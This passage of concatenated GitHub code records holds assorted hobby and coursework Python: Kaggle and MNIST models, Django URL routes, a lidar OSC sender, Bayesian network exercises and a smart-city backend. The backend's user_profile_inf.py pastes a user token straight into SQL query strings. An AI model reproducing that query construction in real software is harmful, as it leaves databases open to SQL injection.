100*sum((test_pred_lgb*w+test_pred_lstm*(1-w)) >= th)/len(test_text)\n if acc >= best_acc:\n best_results = copy.copy(results)\n best_w = w\n best_acc = acc\n best_th = th\n print('Weights ({0:.2f},{1:.2f}), validation AUC: {2:.3f}, validation accuracy: {3:.2f}%@{4:.3f}, test survival rate: {5:.2f}%'.format(w,1-w,auc,acc,th,pos))\n\nout_df = pd.DataFrame(data={'PassengerId':test_data['PassengerId'],'Survived':((test_pred_lgb*best_w+test_pred_lstm*(1-best_w)) >= best_th).astype(int)}).set_index('PassengerId',drop=True)\nout_df.to_csv('submission.csv')\n\n","repo_name":"sajedjalil/Data-Science-Pipeline-Detector","sub_path":"dataset/tabular-playground-series-apr-2021/Oscar/synthetictitanicdata-lightgbm-lstmnameencoder.py","file_name":"synthetictitanicdata-lightgbm-lstmnameencoder.py","file_ext":"py","file_size_in_byte":16132,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"54"} +{"seq_id":"18372575032","text":"from resources.db_queries.connection import db\n\nfrom resources.modules import json_serializable\n\nfrom json import dumps\n\n\ndef get_user_inf(token):\n\n # Данные пользователя\n us_data = db.q_execute(\n '''select \n\t\t\tfu.image,\n\t\t\tfu.user_fio\n\t\tfrom dev.fct_user fu\n\t\twhere \n\t\t\tfu.id_user = cast( '%s' as uniqueidentifier) '''\n % token\n )[0]\n\n # Данные достижений\n us_ach_data = db.q_execute(\n ''' 
\n\t\tselect top 4\n\t\t\tda.ach_name,\n\t\t\tua.ach_status,\n\t\t\tda.attch_image,\n\t\t\tcast((ua.progress*1.0)/(da.ach_end_point*1.0)*100.0 as int),\n\t\t\tda.ach_desc\n\t\tfrom \n\t\t\tdev.fct_user_achievements ua\n\t\tjoin dev.dim_achievements da \n\t\t\ton da.id_achievement = ua.id_achievement \n\t\twhere ua.id_user = cast( '%s' as uniqueidentifier)\n\t\t'''\n % token\n )\n\n # Данные карты\n us_card_data = db.q_execute(\n '''\n\t\tselect\n\t\t\tfc.acc_num,\n\t\t\tcast(fc.acc_balance as varchar),\n\t\t\tcast(fc.acc_bns_balance as varchar)\n\t\tfrom \t\n\t\t\tdev.fct_cards fc \n\t\twhere fc.id_user = cast( '%s' as uniqueidentifier)\n\t\t'''\n % token\n )[0]\n\n # Данные транзакций\n us_transactions = db.q_execute(\n '''\n\t\tselect\n\t\t\t'Пополнение' tp,\n\t\t\t'Умная карта' org,\n\t\t\tcast(fcr.transaction_sum as varchar),\n\t\t\tconvert(varchar, fcr.transaction_dttm, 103)\n\t\tfrom \n\t\t\tdev.fct_cards fc \n\t\tleft join dev.fct_card_replenishment fcr\n\t\t\ton fc.id_card = fcr.id_card\n\t\twhere fc.id_user = cast( '%s' as uniqueidentifier)\n\t\tunion all \n\t\tselect\n\t\t\t'Списание' tp,\n\t\t\tfo.org_name ,\n\t\t\tcast(fwo.transaction_sum as varchar),\n\t\t\tconvert(varchar, fwo.transaction_dttm, 103) \n\t\tfrom \n\t\t\tdev.fct_cards fc \n\t\tleft join dev.fct_write_offs fwo \n\t\t\ton fc.id_card = fwo.id_card\n\t\tleft join dev.fct_organizations fo \n\t\t\ton fwo.id_organization = fo.id_organization \n\t\twhere fc.id_user = cast( '%s' as uniqueidentifier)\n\t\t'''\n % (token, token)\n )\n\n rspns = json_serializable('json')\n\n rspns.add_features('img', us_data[0])\n rspns.add_features('fio', us_data[1])\n rspns.add_feature_list('achievments')\n rspns.add_features('card', {\n 'number': us_card_data[0], 'balance': us_card_data[1], \"bonuce\": us_card_data[2]})\n # dat.add_feature_list('events')\n rspns.add_feature_list('subscribes')\n rspns.add_feature_list('transaction')\n\n for item in us_ach_data:\n rspns.data[0]['achievments'].append(\n {'name': item[0], 'status': item[1], 'img': item[2], 'progressbar': item[3], \"tooltip\": item[4]})\n\n rspns.data[0]['subscribes'].append(\n {'name': 'dad', 'img': 'https://sun1-84.userapi.com/s/v1/if1/9Kq86zbwk3njs6BgBuY9fRSVgr-enaUwuQX2kHIUC4nfDMd8XkA51s8FxBka-TNG4ew29is0.jpg?size=100x0&quality=96&crop=0,420,1320,1320&ava=1', 'content': 'kekw', 'adress': 'kekw', 'link': 'штош'})\n\n for item in us_transactions:\n rspns.data[0]['transaction'].append(\n {'type': item[0], 'recipient': item[1], 'value': item[2], 'data': item[3]})\n\n return dumps(rspns.data[0])\n","repo_name":"cringeburger/smart-city-backend","sub_path":"resources/db_queries/user_profile_inf.py","file_name":"user_profile_inf.py","file_ext":"py","file_size_in_byte":3032,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"2447791103","text":"players = [ #list of player dictionaries\n {\n \t\"name\": \"Kevin Durant\", \n \t\"age\":34, \n \t\"position\": \"small forward\", \n \t\"team\": \"Brooklyn Nets\"\n },\n {\n \t\"name\": \"Jason Tatum\", \n \t\"age\":24, \n \t\"position\": \"small forward\", \n \t\"team\": \"Boston Celtics\"\n },\n {\n \t\"name\": \"Kyrie Irving\", \n \t\"age\":32, \"position\": \"Point Guard\", \n \t\"team\": \"Brooklyn Nets\"\n },\n {\n \t\"name\": \"Damian Lillard\", \n \t\"age\":33, \"position\": \"Point Guard\", \n \t\"team\": \"Portland Trailblazers\"\n },\n {\n \t\"name\": \"Joel Embiid\", \n \t\"age\":32, \"position\": \"Power Foward\", \n \t\"team\": \"Philidelphia 76ers\"\n },\n {\n 
\t\"name\": \"\", \n \t\"age\":16, \n \t\"position\": \"P\", \n \t\"team\": \"en\"\n }\n]\n\n############################################ CHALLENGE 1 ############################################\nclass Player:\n def __init__(self, player): #removed individual args. inserted dict variable\n self.name = player[\"name\"] #assigned all Player object attributes by using dictionary keys\n self.age = player[\"age\"]\n self.position = player[\"position\"]\n self.team = player[\"team\"]\n\n ############### NINJA BONUS ###############\n @classmethod\n def get_team(cls, team_list):\n team = []\n for player in team_list:\n team.append(cls(player))\n return team\n\n#testing class method with these lines\ncls_method_team = Player.get_team(players) \nprint(len(cls_method_team))\n\n############################################ CHALLENGE 2 ############################################\nkevin = {\n \t\"name\": \"Kevin Durant\", \n \t\"age\":34, \n \t\"position\": \"small forward\", \n \t\"team\": \"Brooklyn Nets\"\n}\njason = {\n \t\"name\": \"Jason Tatum\", \n \t\"age\":24, \n \t\"position\": \"small forward\", \n \t\"team\": \"Boston Celtics\"\n}\nkyrie = {\n \t\"name\": \"Kyrie Irving\", \n \t\"age\":32, \"position\": \"Point Guard\", \n \t\"team\": \"Brooklyn Nets\"\n}\n\nplayer_kevin = Player(kevin)\nplayer_jason = Player(jason)\nplayer_kyrie = Player(kyrie)\n\n############################################ CHALLENGE 3 ############################################\nnew_team = []\nfor player in players:\n new_team.append(Player(player))\n","repo_name":"reidroberts24/Python-Fundamentals","sub_path":"fundamentals/oop/basketball_dictionaries.py","file_name":"basketball_dictionaries.py","file_ext":"py","file_size_in_byte":2189,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"33549280525","text":"\"\"\"\nTitle:\npython_osc_send_v2.py\n\n# Part of the installation for final year project\n#\nDescription:\nRoboPeak Lidar sensor runs to collect\nangle and distance data of reflected objects\nThis is in turn sent to another Raspberry Pi, using Open Sound control\n(OSC)\n\nPart of work for final project\nMA Computational Art\n2018\nVersion 0.2\n\nAuthor:\njames@tregaskis.org\nDate:\nAugust 2018\n\nCredits:\ncode adapted from\nhttps://pypi.org/project/python-osc/\nand\nhttps://github.com/SkoltechRobotics/rplidar\n\n\"\"\"\nimport argparse\nimport random\nimport time\nimport sys\n\nfrom rplidar import RPLidar\n\nfrom pythonosc import osc_message_builder\nfrom pythonosc import udp_client\nPORT_NAME = '/dev/ttyUSB0'\n\nlidar = RPLidar(PORT_NAME)\n\nlidar.stop()\nlidar.clear_input()\n\n#Added this delay avoid Lidar throwing Incorrect descriptor me ssage and failing\ntime.sleep(2)\n#################################################################\ninfo = lidar.get_info()\nprint(info)\n\nhealth = lidar.get_health()\nprint(health)\nANGLE=2\nDISTANCE=3\n#2000 prob ok for exhibition, 500 for garage\nIGNORE_REDINGS_BEYOND = 4500\nPORT_FOR_RECEIVING_MACHINE=5005\ntry:\n if __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--ip\", default=\"10.10.10.1\",\n help=\"The ip of the OSC server\")\n parser.add_argument(\"--port\", type=int, default=PORT_FOR_RECEIVING_MACHINE,\n help=\"The port the OSC server is listening on\")\n args = parser.parse_args()\n client = udp_client.SimpleUDPClient(args.ip, args.port)\n\n\n distance_old=[None]*361;\n\n distance_new=[None]*361;\n # this is the important part, to send the polar position data to PI 
no. 2\n for measurment in lidar.iter_measurments():\n # strength of laser, angle of reading, distance\n #print(\"ANGLE \",int(measurment[2]))\n #print(\"DISTANCE\", int(measurmen[3])\n if int(measurment[1]) > 0:\n if int(measurment[DISTANCE]) < IGNORE_REDINGS_BEYOND :\n distance_new[int(measurment[ANGLE])] = int(measurment[DISTANCE])\n if distance_new[int(measurment[ANGLE])] != distance_old[int(measurment[ANGLE])] :\n\n an = int(measurment[ANGLE])\n di = int(distance_new[int(measurment[ANGLE])])\n distance_old[int(measurment[ANGLE])]=distance_new[int(measurment[ANGLE])]\n print(an,di)\n distance_new[int(measurment[ANGLE])]=int(measurment[ANGLE])\n # transmit data using OSC protocol\n client.send_message(\"/st\", [an, di])\n ######################################\n\n time.sleep(1)\nexcept IOError as ioex:\n\tprint (ioex)\n\tpass\nexcept KeyboardInterrupt:\n print('Ctrl-c pressed, Stopping.')\n\nexcept Exception as e: print(e)\nfinally:\n #osc_terminate()\n lidar.stop()\n lidar.disconnect()\n","repo_name":"jtreg/forgiveness_machine","sub_path":"pi_lidar/python/osc/python_osc_send_V2.py","file_name":"python_osc_send_V2.py","file_ext":"py","file_size_in_byte":2856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"10891862443","text":"sid = input(\"enter your student id (SID) : \")\nfullname=input(\"enter your name: \")\naddress=input(\"enter your address: \")\nemail=input(\"enter your email: \")\n\nprint(\"SID: {}\".format(sid))\nprint(\"name {}\".format(fullname))\nprint(\"address {}\".format(address))\nprint(\"email {}\".format(email))\n\nsid=None\nsid=1\nsid=3\nsid=878878799\nsid=[1,2.34,345+88,\"pcps\",\"laudu\"]\nsid={1,2.34,345+88,\"pcps\",\"laudu\"}\nsid={\n \"ab\":\"V\",\"lodu\":23}\n\nprint(sid)\nprint(type(sid))\nprint(id(sid))\n\n\n# data types - None,int,float, str,list,tuple,set,dict,boolean\n\n\n#operators -arithmetic\n# +,-,*,/,%,//,**,//\n# int,float,complex, boolean, )( list , tuple ,set, dict, class\n\n#relational\n# >, >= ,<= ,!=, == ,<","repo_name":"CodeWithVaruag/PythonPratice","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"122251075","text":"from django.conf.urls import patterns, include, url\nfrom django.views.generic import RedirectView\nfrom portal.feeds import LatestMedia, TorrentFeed, ChannelFeed, ChannelFeedTorrent, CollectionFeed, CollectionFeedTorrent, CommentsFeed\nfrom livestream.feeds import UpcomingEvents\n\nimport lambdaproject.settings as settings\n\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n # Examples:\n url(r'^$', 'portal.views.index'),\n url(r'^favicon\\.ico$', RedirectView.as_view(url='/static/favicon.ico')),\n url(r'^item/(?P[-\\w]+)/$', 'portal.views.detail'),\n url(r'^item/(?P[-\\w]+)/get_duration$', 'portal.views.get_duration'),\n url(r'^tags/(?P[\\w|\\W]+)/$', 'portal.views.tag'),\n url(r'^collection/(?P[-\\w]+)/$', 'portal.views.collection'),\n url(r'^json_tags/(?P[\\w|\\W]+)/$', 'portal.views.tag_json'),\n url(r'^channel/(?P[-\\w]+)/$', 'portal.views.channel_list'),\n url(r'^item/iframe/(?P[-\\w]+)/$', 'portal.views.iframe'),\n url(r'^submittal/(?P\\d+)/$', 'portal.views.submittal'),\n url(r'^search/', 'portal.views.search'),\n url(r'^json_search/', 'portal.views.search_json'),\n url(r'^submit/', 'portal.views.submit'),\n url(r'^thumbnail/', 'portal.views.upload_thumbnail'),\n url(r'^status/', 
'portal.views.status'),\n url(r'^p/(?P[-\\w]+)/$', 'pages.views.page'),\n url(r'^stream/$', 'livestream.views.current'),\n url(r'^stream/list/$', 'livestream.views.list_streams'),\n url(r'^stream/(?P[-\\w]+)/$', 'livestream.views.detail'),\n url(r'^login/', 'django.contrib.auth.views.login'),\n url(r'^logout/', 'django.contrib.auth.views.logout', {'next_page': '/'}),\n url(r'^feeds/latest/(?P[-\\w]+)/$', LatestMedia()),\n url(r'^feeds/stream/upcoming', UpcomingEvents()),\n url(r'^feeds/latest/torrent', TorrentFeed()),\n url(r'^feeds/(?P[-\\w]+)/(?P[-\\w]+)/$', ChannelFeed()),\n url(r'^feeds/(?P[-\\w]+)/torrent/$', ChannelFeedTorrent()),\n url(r'^feeds/collection/(?P[-\\w]+)/(?P[-\\w]+)/$', CollectionFeed()),\n url(r'^feeds/collection/(?P[-\\w]+)/torrent/$', CollectionFeedTorrent()),\n url(r'^feeds/comments/$', CommentsFeed()),\n url(r'^captcha/', include('captcha.urls')),\n url(r'^admin/', include(admin.site.urls)),\n)\n\nif \"django.contrib.admindocs\" in settings.INSTALLED_APPS:\n urlpatterns += patterns('',\n url(r'^admindocs/', include('django.contrib.admindocs.urls')),\n )\n\nif settings.DEBUG:\n urlpatterns += patterns('',\n url(r'^media/(?P.*)$', 'django.views.static.serve', {\n 'document_root': settings.MEDIA_ROOT,\n }),\n )\n urlpatterns += patterns('django.contrib.staticfiles.views',\n url(r'^static/(?P.*)$', 'serve'),\n )\n","repo_name":"LambdaCast/LambdaCast","sub_path":"lambdaproject/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2844,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"54"} +{"seq_id":"243231190","text":"from django.contrib import admin\nfrom django.contrib.auth.views import LoginView, LogoutView\nfrom django.urls import path, include, reverse_lazy\n\nfrom engine.forms import LoginForm, RegisterForm\nfrom engine.views import *\n\naccounts_urls = [\n path(\n 'login/',\n LoginView.as_view(template_name=\"login.html\", authentication_form=LoginForm),\n name='login'\n ),\n path(\n 'register/',\n CreateView.as_view(\n template_name='register.html',\n model=User,\n form_class=RegisterForm,\n success_url=reverse_lazy('main')\n ),\n name='register'\n ),\n path(\n 'logout/',\n LogoutView.as_view(template_name=\"logout.html\"),\n name='logout'\n ),\n]\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('', TemplateView.as_view(template_name=\"main.html\"), name='main'),\n path('shorten/', ShortUrlView.as_view(), name='short_url'),\n path('links/', UserLinksView.as_view(), name='user_links_list'),\n path('link/', UserLinkDetailView.as_view(), name='user_link_detail'),\n path('accounts/', include(accounts_urls)),\n path('', RedirectUrlView.as_view()),\n]\n","repo_name":"briefausde/urlshorter","sub_path":"urlshorter/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1195,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"14993800403","text":"def solution(babbling):\n \n talk = [\"aya\", \"ye\", \"woo\", \"ma\"]\n answer = 0\n for i in babbling:\n for j in talk:\n if j * 2 not in i:\n i = i.replace(j, ' ')\n if i.isspace():\n answer+=1\n return answer","repo_name":"5P2RS5/Python_for_infra","sub_path":"programmers/1/133499.py","file_name":"133499.py","file_ext":"py","file_size_in_byte":260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"10870587357","text":"import json\nimport sqlite3\nfrom datetime import datetime\n\n\nwith open('data/json/sample_class.json', 'r') as 
json_file:\n data = json.load(json_file)\n\n# Connect to the database\nconnection = sqlite3.connect('data/ATTA.sqlite')\ncursor = connection.cursor()\n\n\n# Clear the table by deleting all rows\ndelete_query = '''\n DELETE FROM country_income_group\n'''\ncursor.execute(delete_query)\n\n# Insert data into the table\ninsert_query = '''\n INSERT INTO country_income_group (economy, region, country_code2, country_code3, income_group, lending_category, etl_insert_ts, etl_update_ts)\n VALUES (?, ?, ?, ?, ?, ?, ?, ?)\n'''\n\nfor row in data:\n current_timestamp = datetime.now()\n cursor.execute(insert_query, (\n row.get(\"Economy\", None),\n row.get(\"Region\", None),\n row.get(\"country_code2\", None),\n row.get(\"Code\", None),\n row.get(\"Income Group\", None),\n row.get(\"Lending Category\", None),\n current_timestamp,\n current_timestamp\n ))\n\nconnection.commit()\nconnection.close()\n\nprint(\"Data inserted into 'country_income_group' table.\")\n\n\n","repo_name":"lorcan17/atta-data","sub_path":"src/python/archive/adhoc/insert_into_country_income_group.py","file_name":"insert_into_country_income_group.py","file_ext":"py","file_size_in_byte":1095,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71997428320","text":"from factor import *\nfrom factorset import *\nfrom naiveinf import *\n\ndef buildrobotex(commandfailrate,stickprob,fpr,fnr):\n\n c = discretevariable(\"c\",2)\n x0 = discretevariable(\"x0\",3)\n x1 = discretevariable(\"x1\",3)\n r0 = discretevariable(\"r0\",2)\n l0 = discretevariable(\"l0\",2)\n r1 = discretevariable(\"r1\",2)\n l1 = discretevariable(\"l1\",2)\n\n px0 = discretefactor({x0})\n px0[{x0:0}] = 1.0/3.0\n px0[{x0:1}] = 1.0/3.0\n px0[{x0:2}] = 1.0/3.0\n\n pc = discretefactor({c})\n pc[{c:0}] = 0.5\n pc[{c:1}] = 0.5\n\n px1x0c = discretefactor({x1,x0,c})\n px1x0c[{}] = 0.0 # initialize to all zeros\n for oldx in range(0,3):\n for cval in range(0,2):\n newx = oldx-1 if cval else oldx+1\n newx = min(max(newx,0),2)\n px1x0c[{x0:oldx,x1:newx,c:cval}] += 1.0-commandfailrate\n px1x0c[{x0:oldx,x1:oldx,c:cval}] += commandfailrate\n \n\n def initsensorcpd(pos,sen,walls):\n f = discretefactor({pos,sen})\n for posval in range(0,3):\n w = walls[posval]\n notw = 1-w\n errrate = fnr if w else fpr\n f[{pos:posval,sen:w}] = 1.0-errrate\n f[{pos:posval,sen:notw}] = errrate\n return f\n\n\n pr0x0 = initsensorcpd(x0,r0,[0,1,0])\n pl0x0 = initsensorcpd(x0,l0,[1,0,0])\n\n def nextsensorcpd(pos,oldsen,sen,walls):\n f = discretefactor({pos,oldsen,sen})\n f[{}] = 0.0\n for posval in range(0,3):\n for oldsenval in range(0,2):\n f[{pos:posval,oldsen:oldsenval,sen:oldsenval}] += stickprob\n w = walls[posval]\n notw = 1-w\n errrate = fnr if w else fpr\n f[{pos:posval,oldsen:oldsenval,sen:w}] += (1.0-stickprob)*(1.0-errrate)\n f[{pos:posval,oldsen:oldsenval,sen:notw}] += (1.0-stickprob)*errrate\n\n return f\n\n pr1r0x1 = nextsensorcpd(x1,r0,r1,[0,1,0])\n pl1l0x1 = nextsensorcpd(x1,l0,l1,[1,0,0])\n \n robotbn = factorset()\n robotbn.addfactor(pc)\n robotbn.addfactor(px0)\n robotbn.addfactor(px1x0c)\n robotbn.addfactor(pr0x0)\n robotbn.addfactor(pl0x0)\n robotbn.addfactor(pr1r0x1)\n robotbn.addfactor(pl1l0x1)\n \n unnorm = pc*pr0x0*pr1r0x1*pl0x0*pl1l0x1\n z = unnorm.marginalize({c,r0,r1,l0,l1})\n norm = unnorm / z\n phinew = unnorm.reduce({r0:1,l0:1,r1:1,l1:1})\n\n return robotbn,(c,x0,x1,r0,r1,l0,l1)\n\ndef buildstudentex():\n # note you will need to have g have values of 0,1,2\n # (not 1,2,3 as in the text)\n\n # remove line below when 
you write your code\n # it is okay just to \"hard code\" all of the values in here\n \n # will need to return your factorset (studentbn below) as the \n # variables in the order d,i,g,s,l (as below)\n \n d= discretevariable(\"d\",2)\n \n i = discretevariable(\"i\",2)\n \n g = discretevariable(\"g\",3)\n \n s = discretevariable(\"s\",2)\n \n l = discretevariable(\"l\",2)\n\n\n pd = discretefactor({d})\n pd[{d:0}] = 0.6\n pd[{d:1}] = 0.4\n\n pi = discretefactor({i})\n pi[{i:0}] = 0.7\n pi[{i:1}] = 0.3\n \n pgid=discretefactor({g,i,d})\n pgid[{g:0,i:0,d:0}]=0.3\n pgid[{g:0,i:0,d:1}]=0.005\n pgid[{g:0,i:1,d:0}]=0.9\n pgid[{g:0,i:1,d:1}]=0.5\n pgid[{g:1,i:0,d:0}]=0.4\n pgid[{g:1,i:0,d:1}]=0.25\n pgid[{g:1,i:1,d:0}]=0.08\n pgid[{g:1,i:1,d:1}]=0.3\n pgid[{g:2,i:0,d:0}]=0.3\n pgid[{g:2,i:0,d:1}]=0.7\n pgid[{g:2,i:1,d:0}]=0.002\n pgid[{g:2,i:1,d:1}]=0.2\n\n\n psi=discretefactor({s,i})\n psi[{s:0,i:0}]=0.95\n psi[{s:0,i:1}]=0.2\n psi[{s:1,i:0}]=0.05\n psi[{s:1,i:1}]=0.8\n\n plg=discretefactor({l,g})\n plg[{l:0,g:0}]=0.1\n plg[{l:0,g:1}]=0.4\n plg[{l:0,g:2}]=0.99\n plg[{l:1,g:0}]=0.9\n plg[{l:1,g:1}]=0.6\n plg[{l:1,g:2}]=0.01\n \n \n \n studentbn = factorset()\n studentbn.addfactor(pd)\n studentbn.addfactor(pi)\n studentbn.addfactor(pgid)\n studentbn.addfactor(psi)\n studentbn.addfactor(plg)\n \n \n return studentbn,(d,i,g,s,l)\n\n\n#### below is the testing code\n\ndef runrobot():\n robotex,(c,x0,x1,r0,r1,l0,l1) = buildrobotex(0.1,0.2,0.05,0.1)\n robotquery = naiveinfval(robotex,{c},{r0:1,l0:1,r1:1,l1:1})\n return (robotquery,c)\n\ndef runstudent():\n studentex,(d,i,g,s,l) = buildstudentex()\n studentquery1 = naiveinf(studentex,{i},{l,s})\n studentquery2 = naiveinfval(studentex,{s},{d:0,l:1})\n return (studentquery1,studentquery2,(d,i,g,s,l))\n\nif __name__ == '__main__':\n # note that rounding used in PS1 solutions will cause the answer to differ\n # from this one (computed without as much rounding) by a bit\n robotquery,_ = runrobot()\n print(robotquery)\n ## should return a factor where c=0 => 0.39676 and c=1 -> 0.603239\n\n\n ## it is up to you to figure out if these examples return the right values\n studentquery1,studentquery2,_ = runstudent()\n print(studentquery1)\n print(studentquery2)\n\n## you should probably write your own tests, as we will be testing your\n## code on different factorsets as well!\n## but don't put them in here, or they will mess up the automatic\n## testing -- write them on your own, but don't submit them!\n","repo_name":"kapish5467/Probabilistic-and-graphical-methods","sub_path":"ps3/testnaiveinf.py","file_name":"testnaiveinf.py","file_ext":"py","file_size_in_byte":5130,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"11822005326","text":"import tensorflow as tf\nfrom tensorflow.examples.tutorials.mnist import input_data\nimport numpy as np\n\n# the loss function we are going to use is the cross-entropy\n# the function (optimzer) we are going to use to minimize cost, \n# is Adam.\n# One epoch is equal to one feedforward cycle plus one backprop cycle.\n# a batch \n\nmnist_data = input_data.read_data_sets(\n\t\"C:/Users/ANTARTIDA/Desktop/Deep_reinforcement_learning/Basics/data\",\n\t one_hot=True)\n# this has 10 classes, being represented as one hot \n# (one pixel is on, the rest is off [1,0,0,0] for 0 out of 3.)\n# mnist dataset are images of 28x28 \n\nn_nodes = [512, 512, 256]\nn_classes = 10\nbatch_size = 100 \n# batch_size : it makes 100 feedforwards and then backprop them.\n\n# the xLabel will be a matrix 
(i.e. it has dimensions: \n# height and width.)\n# the second arg in xLabel placeholder is the dimensions of \n# the matrix we are going to use. \n# [None, 784] shape tells us that the input is going to be a vector\n# containing the whole image ( 28x28 = 784 ).\nshape = [None, 784]\nxLabel = tf.placeholder(tf.float32, [None, 784])\nyLabel = tf.placeholder(tf.float32)\n\ndef FFNN_model(data): # CHECK THIS FUNCTIONS, IT GIVES AN ERROR INVOLVING THE LAST LAYER\n\thidden_lays = []\n\tlayers = []\n\tfor i in range(0,len(n_nodes)+1):\n\t\tif i == 0: \n\t\t\thidden_lays.append(\n\t\t\t\t{\"weights\": tf.Variable(tf.random_normal([shape[1],\n\t\t\t\t\tn_nodes[i]])),\n\t\t\t\t \"bias\":tf.Variable(tf.ones([n_nodes[i]])), \n\t\t\t\t}\n\t\t\t)\n\t\telif i == len(n_nodes):\n\t\t\thidden_lays.append(\n\t\t\t\t{\"weights\": tf.Variable(tf.random_normal([n_nodes[i-1],\n\t\t\t\t\tn_classes])),\n\t\t\t\t \"bias\":tf.Variable(tf.ones([n_classes])), \n\t\t\t\t}\n\t\t\t)\n\t\telse:\n\t\t\thidden_lays.append(\n\t\t\t\t{\"weights\": tf.Variable(tf.random_normal([n_nodes[i-1],\n\t\t\t\t\tn_nodes[i]])),\n\t\t\t\t \"bias\":tf.Variable(tf.ones([n_nodes[i]])), \n\t\t\t\t}\n\t\t\t)\n\tfor i in range(len(hidden_lays)):\n\t\tif i == 0: \n\t\t\tlayers.append(tf.nn.relu(tf.add(tf.matmul(\n\t\t\t\tdata, hidden_lays[i][\"weights\"]), \n\t\t\t\thidden_lays[i][\"bias\"])))\n\t\telse:\n\t\t\tlayers.append(tf.nn.relu(tf.add(tf.matmul(\n\t\t\t\tlayers[i-1], hidden_lays[i][\"weights\"]), \n\t\t\t\thidden_lays[i][\"bias\"])))\n\n\treturn layers[len(layers)-1]\n\n\ndef backprop(xLabels):\n\t# the hypothesis is going to be one hot\n\thypothesis = FFNN_model(xLabels) \n\tcost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=hypothesis, labels=yLabel))\n\tno_reduce_mean_cost = tf.nn.softmax_cross_entropy_with_logits(logits=hypothesis, labels=yLabel)\n\n\toptimzer = tf.train.AdamOptimizer(0.01).minimize(cost)\n\n\tn_epochs = 50\n\n\twith tf.Session() as s:\n\t\ts.run(tf.global_variables_initializer())\n\t\tfor epoch in range(n_epochs):\n\t\t\tepoch_loss = 0\n\t\t\tfor episode in range(int(mnist_data.train.num_examples/batch_size)):\n\t\t\t\txLab, yLab = mnist_data.train.next_batch(batch_size) # chunks data for me \n\t\t\t\tepisode, cost_in_episode = s.run([optimzer, cost], feed_dict={xLabel: xLab, yLabel: yLab})\n\t\t\t\tepoch_loss += cost_in_episode\n\t\t\tprint(\"Epoch \", epoch, \"/\", n_epochs, \". 
Loss: \", epoch_loss)\n\n\t\tprediction = tf.equal(tf.argmax(hypothesis,1), tf.argmax(yLabel,1)) \n\t\t# remember those are onehot\n\n\t\taccuracy = tf.reduce_mean(tf.cast(prediction, \"float\"))\n\t\tprint(\"Test accuracy: \", accuracy.eval({xLabel:mnist_data.test.images, \n\t\t\tyLabel:mnist_data.test.labels}))\n\nif __name__ == '__main__':\n\tbackprop(xLabel)","repo_name":"SimplyRocketMan/Deep_reinforcement_learning","sub_path":"Basics/FFNN_TF.py","file_name":"FFNN_TF.py","file_ext":"py","file_size_in_byte":3282,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"34193401081","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\n\nclass Solution:\n def swapPairs(self, head):\n \"\"\"\n :type head: ListNode\n :rtype: ListNode\n \"\"\"\n if not head:\n return\n node = head\n prev_node = None\n\n if head.next:\n head = head.next\n\n while node:\n node2 = node.next\n if not node2:\n return head\n node.next = node2.next\n node2.next = node\n\n if prev_node:\n prev_node.next = node2\n\n prev_node = node\n node = node.next\n\n return head\n\n\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\n\nclass Solution:\n def swapPairs(self, head):\n \"\"\"\n :type head: ListNode\n :rtype: ListNode\n \"\"\"\n if not head:\n return\n node = head\n\n if head.next:\n head = head.next\n node.next = self.swapPairs(head.next)\n head.next = node\n\n return head\n","repo_name":"bartlesy/algo-puzzles","sub_path":"swap_pairs.py","file_name":"swap_pairs.py","file_ext":"py","file_size_in_byte":1189,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"28356028387","text":"'''\nauthor: Aditi Anant Munjekar\n'''\n\nimport numpy as np\nfrom scipy.stats import norm\n\ndef condprob(x, n, y, params):\n return norm.pdf(x, params[n][y]['mean'], params[n][y]['var'])\n\ndef learn(data, N, Y):\n params = {}\n for n in range(N):\n params[n] = {}\n for y in range(Y):\n params[n][y] = {}\n subset = []\n for obs in data:\n if obs[-1] == y:\n subset.append(obs[n])\n params[n][y]['mean'] = np.mean(subset)\n params[n][y]['var'] = np.var(subset)\n\n return params\n\ndef classify(obs, params, N, Y):\n ans = []\n for y in range(Y):\n prob = 1\n for n in range(N):\n prob *= condprob(obs[n], n, y, params)\n ans.append(prob)\n return ans\n\ndef majority(data):\n count, count0, count1 = 0, 0, 0\n for i in (data):\n if i[-1] == 1.0:\n count1 = count + 1\n if i[-1] == 0.0:\n count0 += 1\n count = max(count0, count1)\n print(count)\n majority = (count / len(data))*100\n return majority\n\ndef demo():\n #complete data\n data = np.array([[float(x) for x in line.strip().split(\",\")] for line in open(\"banknote.train\").readlines()])\n print('Loaded %d observations.' 
